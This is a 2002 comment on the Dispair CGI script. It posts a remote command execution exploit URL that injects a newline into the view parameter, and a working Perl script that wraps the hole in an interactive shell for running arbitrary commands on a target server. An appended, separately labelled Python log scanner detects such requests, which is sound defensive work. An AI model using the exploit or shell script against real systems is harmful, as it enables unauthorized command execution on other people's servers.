Comments for Dispair

30 Jul 2002 16:47 404

remote command execution exploit
http://target/cgi-bin/dispair.cgi?file=fiddle&view=%0A/usr/bin/id

Here is a perl script that provides a shell-like interface:

#!/usr/bin/perl

use strict;
use IO::Socket;

my $target = shift || die "usage: $0 <targetserver>";
my $cmd = '';

while ($cmd ne 'exit') {
    print ">> ";
    $cmd = <STDIN>;
    chomp $cmd;
    $cmd =~ s/ /%20/g;
    my $socket = IO::Socket::INET->new(PeerAddr => $target, PeerPort => 'http(80)', Proto => 'tcp');
    print $socket "GET /cgi-bin/dispair.cgi?file=fiddle&view=%0A$cmd HTTP/1.0\n";
    print $socket "Host: $target\n";
    print $socket "USER-AGENT: scriptkiddie\n\n";
    while (<$socket>) { last if ($_ =~ m/^\r/); }
    while (<$socket>) { print; }
    close $socket;
}
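
For defenders reviewing web server logs, the request pattern in the comment above (a percent-encoded newline in the view parameter of dispair.cgi) can be flagged as shown here. This is an added example, not part of the original comment or of the Dispair project; the Common Log Format input, the sample lines and all function names are assumptions constructed for illustration, and the check generalizes from %0A to any control character in any parameter, including double-encoded forms.

```python
import re
from urllib.parse import urlsplit, unquote

# Request line inside a Common/Combined Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")  # LF (%0A), CR, NUL, ...
SCRIPT = "dispair.cgi"

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%250A) is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return [(name, decoded_value)] for dispair.cgi parameters holding control chars."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path.rsplit("/", 1)[-1] != SCRIPT:
        return []
    hits = []
    # Split on the raw '&' before decoding so decoding cannot move parameter boundaries.
    for pair in url.query.split("&"):
        name, _, raw = pair.partition("=")
        value = fully_decode(raw.replace("+", " "))
        if CONTROL_RE.search(value):
            hits.append((unquote(name), value))
    return hits

def scan(lines):
    """Return [(line_number, hits)] for every log line with at least one hit."""
    return [(n, h) for n, line in enumerate(lines, 1) if (h := suspicious_params(line))]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jul/2002:16:40:01 +0000] "GET /cgi-bin/dispair.cgi?file=fiddle&view=README HTTP/1.0" 200 512',
    '192.0.2.44 - - [30/Jul/2002:16:47:12 +0000] "GET /cgi-bin/dispair.cgi?file=fiddle&view=%0A/usr/bin/id HTTP/1.0" 200 87',
    '192.0.2.44 - - [30/Jul/2002:16:47:30 +0000] "GET /cgi-bin/dispair.cgi?file=fiddle&view=%250A/usr/bin/id HTTP/1.0" 200 87',
    '192.0.2.10 - - [30/Jul/2002:16:48:02 +0000] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {hits!r}")
```

A hit means the request was sent, not that the command ran; the response size and any process or audit logs on the host are what confirm execution.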
